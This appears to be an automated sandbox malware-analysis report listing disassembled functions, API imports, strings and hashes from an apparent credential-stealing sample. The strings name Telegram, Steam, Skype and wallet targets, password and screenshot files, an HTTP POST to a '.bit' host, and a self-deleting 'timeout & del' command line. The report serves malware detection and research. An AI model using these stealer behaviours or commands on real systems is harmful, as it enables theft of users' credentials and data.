Function 00418688 Relevance: 42.4, APIs: 19, Strings: 5, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418714
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418728
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418B80,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418748
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 0041875C
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00418771
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00418786
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041879B
GetProcAddress.KERNEL32(00000000,-00000053), ref: 004187B0
GetProcAddress.KERNEL32(00000000,-00000064), ref: 004187C5
GetProcAddress.KERNEL32(00000000,-00000075), ref: 004187DA
GetProcAddress.KERNEL32(00000000,-00000089), ref: 004187F0
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00418807
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 004188F3
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C), ref: 00418984
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 004189C4
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000), ref: 00418A21
HttpSendRequestA.WININET(00000000,00418CB8,00000000,00000000,00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A72
InternetReadFile.WININET(00000000,?,00010064,?,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418A9D
InternetCloseHandle.WININET(00000000,?,?,0041B0FC,0000044D,000021E5,00000000,00000000,00000000,?,0041923C,00000000), ref: 00418AD4

Strings

POST, xrefs: 004186DD
.bit, xrefs: 00418928
Host: , xrefs: 00418951
wininet.dll, xrefs: 00418701
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041897F

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpLibraryLoadOpenRequest$CloseConnectCrackFileModuleReadSend
String ID: .bit$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 1919173369-2879170074
Opcode ID: d00b6bce0946ca1063592c19d8de3ae7113a67940ae5b28bc5aab163a8a72812
Instruction ID: 76fb72323b8ae20ff65678eff3f65f90e6b3cd7dcd45201054b3a4b47af70050
Opcode Fuzzy Hash: d00b6bce0946ca1063592c19d8de3ae7113a67940ae5b28bc5aab163a8a72812
Instruction Fuzzy Hash: 8AE1EAB1910219ABDB10EFA5CC86BDEBBBCBF44305F10417AF504B6681DB78AA458B58

Function 00785374 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 0078537D

Strings

e, xrefs: 007853A5
., xrefs: 007853B3
k, xrefs: 00785397
3, xrefs: 007853AC
l, xrefs: 007853BA
r, xrefs: 0078539E

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID: .$3$e$k$l$r
API String ID: 560597551-427081609
Opcode ID: 015984842d46d1622cf35f8f2bc086576ce56ee08c7bf0c21f0fc58584c07109
Instruction ID: 36a3a1d159784db5e80121e28a845806a3bcc82d0622a44abea3f6b3baec38b8
Opcode Fuzzy Hash: 015984842d46d1622cf35f8f2bc086576ce56ee08c7bf0c21f0fc58584c07109
Instruction Fuzzy Hash: 9201F731500614CFDB10EF48C884BADBBF5FB04778F240119D801B7580C3F4AA84CBA0

Function 0078537F Relevance: 3.8, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

., xrefs: 007853B3
l, xrefs: 007853BA
GetProcAddress, xrefs: 00785430, 00785433, 00785438

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress$l
API String ID: 0-2021252165
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: bfde5c15a42227c88bae6f53a944d21ae76a80eb23da2905a5c37a7fae8f6e0d
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: FD316CB6900619DFDB10DF99C884AADBBF9FF08368F64414AD801A7710D7B5EA44CFA4

Function 004065CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756

Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
GetProcAddress.KERNEL32(75A50000,EnumDisplayDevicesW), ref: 00405A14
GetProcAddress.KERNEL32(75A50000,wvsprintfA), ref: 00405A29
GetProcAddress.KERNEL32(75A50000,GetKeyboardLayoutList), ref: 00405A3E
LoadLibraryA.KERNEL32(shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
GetProcAddress.KERNEL32(75320000,ShellExecuteExW), ref: 00405A62
LoadLibraryA.KERNEL32(ntdll.dll,75320000,ShellExecuteExW,shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
GetProcAddress.KERNEL32(76E80000,RtlComputeCrc32), ref: 00405A86

Strings

GetTimeZoneInformation, xrefs: 0040583E
FindClose, xrefs: 0040579C
CreateToolhelp32Snapshot, xrefs: 004057C0
LookupAccountSidA, xrefs: 00405922
AllocateAndInitializeSid, xrefs: 00405910
CloseHandle, xrefs: 0040568E
GetUserNameW, xrefs: 004058B6
GetLastError, xrefs: 004056E8
GetCurrentDirectoryW, xrefs: 004056FA
FindFirstFileW, xrefs: 00405742
GetDriveTypeA, xrefs: 00405886
CryptAcquireContextA, xrefs: 0040598E
DeleteFileW, xrefs: 00405862
GetFileAttributesW, xrefs: 004056B2
ExpandEnvironmentStringsW, xrefs: 00405634
Process32NextW, xrefs: 004057E4
GlobalMemoryStatusEx, xrefs: 004057AE
CryptGetHashParam, xrefs: 004059C4
SetCurrentDirectoryW, xrefs: 00405730
RtlComputeCrc32, xrefs: 00405A7B
GetKeyboardLayoutList, xrefs: 00405A33
ShellExecuteExW, xrefs: 00405A57
CreateMutexA, xrefs: 004056C4
SetDllDirectoryW, xrefs: 00405808
GetModuleFileNameW, xrefs: 004057F6
CheckTokenMembership, xrefs: 00405946
ntdll.dll, xrefs: 00405A6C
RegOpenKeyW, xrefs: 00405958
CryptCreateHash, xrefs: 004059A0
ReadFile, xrefs: 004056A0
GetTickCount, xrefs: 00405778
SetEnvironmentVariableW, xrefs: 0040570C
CryptReleaseContext, xrefs: 004059E8
RegQueryValueExW, xrefs: 004058DA
RegEnumValueW, xrefs: 0040597C
GetLogicalDriveStringsA, xrefs: 00405874
CreateFileW, xrefs: 0040566A
wvsprintfA, xrefs: 00405A1E
LocalFree, xrefs: 00405766
GlobalMemoryStatus, xrefs: 00405658
CreateProcessW, xrefs: 00405898
user32.dll, xrefs: 004059FA
RegCreateKeyExW, xrefs: 004058C8
CopyFileW, xrefs: 0040578A
GetEnvironmentVariableW, xrefs: 0040571E
RegCloseKey, xrefs: 004058EC
FindNextFileW, xrefs: 00405754
GetLocalTime, xrefs: 0040582C
RegEnumKeyW, xrefs: 0040596A
kernel32.dll, xrefs: 00405628
CreateProcessAsUserW, xrefs: 00405934
Process32FirstW, xrefs: 004057D2
CryptHashData, xrefs: 004059B2
CryptDestroyHash, xrefs: 004059D6
GetFileSize, xrefs: 0040567C
RemoveDirectoryW, xrefs: 00405850
GetLocaleInfoA, xrefs: 0040581A
shell32.dll, xrefs: 00405A48
RegOpenKeyExW, xrefs: 004058FE
advapi32.dll, xrefs: 004058AA
GetComputerNameW, xrefs: 00405646
ReleaseMutex, xrefs: 004056D6
EnumDisplayDevicesW, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-617434850
Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C

Function 00423704 Relevance: 102.5, APIs: 17, Strings: 41, Instructions: 973
synchronizationtimesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_sprintf.LIBCMT ref: 00423724
_sprintf.LIBCMT ref: 0042372F

Part of subcall function 00425B7E: __output_l.LIBCMT ref: 00425BD9

EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004238D5
EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 004238E1
GetStringTypeA.KERNEL32(00000000,00000000,0043CFC0,00000000,?), ref: 004238F9
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00423912
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0042391C
WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0042392A
MoveFileWithProgressA.KERNEL32(0043D014,0043CFF8,00000000,00000000,00000000), ref: 00423940
Sleep.KERNEL32(00000000), ref: 00423948
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00423952
_malloc.LIBCMT ref: 0042396C

Part of subcall function 00425AEA: __FF_MSGBANNER.LIBCMT ref: 00425B03
Part of subcall function 00425AEA: __NMSG_WRITE.LIBCMT ref: 00425B0A
Part of subcall function 00425AEA: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00425B2F

_calloc.LIBCMT ref: 00423976
GetTickCount.KERNEL32 ref: 0042399F
IsProcessorFeaturePresent.KERNEL32(00000000), ref: 004239B3
GlobalAlloc.KERNEL32(00000000), ref: 00423A0A
LoadLibraryW.KERNEL32(0043D028), ref: 00423BB5

Strings

)Wc., xrefs: 004242D4
+, xrefs: 00424A51
IE_|, xrefs: 00423CC6
|s], xrefs: 00423E10
^js{, xrefs: 004241C6
['Ml, xrefs: 004241B2
,mSw, xrefs: 00424130
>2, xrefs: 00423CBC
OR, xrefs: 00424741
bu5\, xrefs: 0042462D
jtI/, xrefs: 004251D7
pkA4, xrefs: 0042405E
SOsX, xrefs: 00424D9B
yjYZ, xrefs: 00424B11
^@, xrefs: 00424C09
k3AH, xrefs: 00424F7C
_kdu, xrefs: 00424090
z(6V, xrefs: 00425132
kZ,, xrefs: 00423C30
Kb5B, xrefs: 004245BE
>u8e, xrefs: 00424A18
YYj, xrefs: 00423729
n(N;, xrefs: 004244C1
%9M , xrefs: 004247DC
b5g, xrefs: 00423E24
8h-Y, xrefs: 00424863
_IM, xrefs: 00424E86
\<4, xrefs: 00424AC0
|MG, xrefs: 00423FDC
aI^, xrefs: 0042454B
jb`{, xrefs: 00424176
2g?, xrefs: 004247ED
H&!, xrefs: 00423FE6
l|L, xrefs: 00423F50
boQd, xrefs: 00424619
?t8f, xrefs: 0042419E
kJH/, xrefs: 00424766
="<s, xrefs: 00424566
;!|?, xrefs: 00424C13
>gw:, xrefs: 00424CFA
I;-A, xrefs: 00424874

Memory Dump Source

Source File: 00000000.00000002.2058649427.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_421000_12E56QE1Fc.jbxd

Similarity

API ID: Wait$EnumFormatsObjectSingleTime_sprintf$AllocAllocateCountFeatureFileFormatGlobalHeapLibraryLoadMessageMoveMultipleObjectsPresentProcessorProgressSleepStringTickTypeWith__output_l_calloc_malloc
String ID: >2$%9M $)Wc.$+$,mSw$2g?$8h-Y$;!|?$="<s$>gw:$>u8e$?t8f$H&!$I;-A$IE_|$Kb5B$SOsX$YYj$['Ml$\<4$^js{$_kdu$_IM$b5g$boQd$bu5\$jb`{$jtI/$k3AH$kJH/$n(N;$pkA4$yjYZ$z(6V$|s]$ ^@$OR$aI^$kZ,$l|L$|MG
API String ID: 3256033748-1437113064
Opcode ID: 8e16e7c29b1a57dfc68f0dae3e932c8777c9b14869131708a6b3611a210a561d
Instruction ID: fe8835b111e3e69dd0f2492bcd7bc76d5d244d183e8102dd78082b8b93f8fb56
Opcode Fuzzy Hash: 8e16e7c29b1a57dfc68f0dae3e932c8777c9b14869131708a6b3611a210a561d
Instruction Fuzzy Hash: 42D221B4A05368CFDBA18F2ADC8978CBBB8BB15304F5441D8E2496A251CB755FC5CF0A

Function 00419108 Relevance: 57.0, APIs: 4, Strings: 28, Instructions: 964
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00419195

Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
Part of subcall function 00408328: CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435

GetSystemMetrics.USER32(00000001), ref: 00419460
GetSystemMetrics.USER32(00000000), ref: 00419468
ExitProcess.KERNEL32(00000000), ref: 00419F2B

Strings

Coins, xrefs: 004193CE
<, xrefs: 00419E1B
http://ip-api.com/json, xrefs: 0041988E
%comspec%, xrefs: 00419E45
<n>, xrefs: 004192A8
Skype, xrefs: 004193F8
0_@, xrefs: 00419CD7, 0041A0EA
D877F783D5*,map*, xrefs: 00419420
Steam, xrefs: 0041943B
exit, xrefs: 00419262
PasswordsList.txt, xrefs: 00419368
</n>, xrefs: 004192A0
</c>, xrefs: 00419279
image/jpeg, xrefs: 00419455
%DSK_, xrefs: 004194C5, 004194E2, 0041956B
GET, xrefs: 00419887
Files\, xrefs: 004196C6, 004197A1
%appdata%\Telegram Desktop\tdata\, xrefs: 00419425
Telegram, xrefs: 0041941B
"countryCode":", xrefs: 004198BA
/c %WINDIR%\system32\timeout.exe 3 & del ", xrefs: 00419E66
<c>, xrefs: 00419281
"query":", xrefs: 004198A4
ip.txt, xrefs: 004198E5, 004198F7
</d>, xrefs: 004192D7
scr.jpg, xrefs: 00419475
<d>, xrefs: 004192DF
System.txt, xrefs: 00419938

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: Create$DirectoryMetricsSystem$ExitMutexProcess
String ID: "countryCode":"$"query":"$%DSK_$%appdata%\Telegram Desktop\tdata\$%comspec%$/c %WINDIR%\system32\timeout.exe 3 & del "$0_@$<$</c>$</d>$</n>$<c>$<d>$<n>$Coins$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$Telegram$exit$http://ip-api.com/json$image/jpeg$ip.txt$scr.jpg
API String ID: 447519224-805684967
Opcode ID: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
Instruction ID: 8e865d1d98f6c8efaf34d3e531d58462b667ba857a61b59ff422c1b99a10b1ba
Opcode Fuzzy Hash: 393cdfa5e90172c38ce23b04994494a061c28785eddfdfed88361b285a484fb5
Instruction Fuzzy Hash: 4F920E34A0011D9FDB11EB55C885BCDB7B9AF49308F5081BBE408B7292DB38AF958F59

Function 00784A90 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00784CA1

Strings

kernel32.dll, xrefs: 00784AE3, 00784AE9
cess, xrefs: 00784BE1

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
Instruction ID: b148caaf183ba31bcc180eb39713418755c7552310afdf56f3d6143cd1db32a4
Opcode Fuzzy Hash: 1d3f1b4fa1104d12923b2607602187910ab13e8cafb3ea4eab99c5b4f5fef507
Instruction Fuzzy Hash: 04127A74A01229DFDB64CFA8C985B9CBBB1BF09304F1480D9E54DAB352DB34AA84DF15

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579

Strings

CryptUnprotectData, xrefs: 00409569
crypt32.dll, xrefs: 0040956E

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
Opcode Fuzzy Hash: 0420e119ad5bb52e5c2197864a8ef738be67dd0fb3c4c8377fbeb38080e5296e
Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AccountCheckFreeLookupMembershipToken
String ID:
API String ID: 1602037265-0
Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

Function 007850C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(msvcr100.dll), ref: 007852EE

Strings

msvcr100.dll, xrefs: 007852E7, 007852ED

Memory Dump Source

Source File: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_783000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: msvcr100.dll
API String ID: 1029625771-4078232268
Opcode ID: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
Instruction ID: 43f6034ec803c5cd3b553355b3c4496bd814a2dd1b2a8b55d13cf52f91180e83
Opcode Fuzzy Hash: d62b7385236eb3342a17d9e4d87b611e39e3cf254c0d8c16f175d63fcb1c783e
Instruction Fuzzy Hash: AC917E74A402698FDB64CF58C984BA8B7B1BF09304F1581E9E40EA7751DB34AEC4DF14

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00404101

Memory Dump Source

Source File: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_12E56QE1Fc.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 2525500382-1514646153
Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
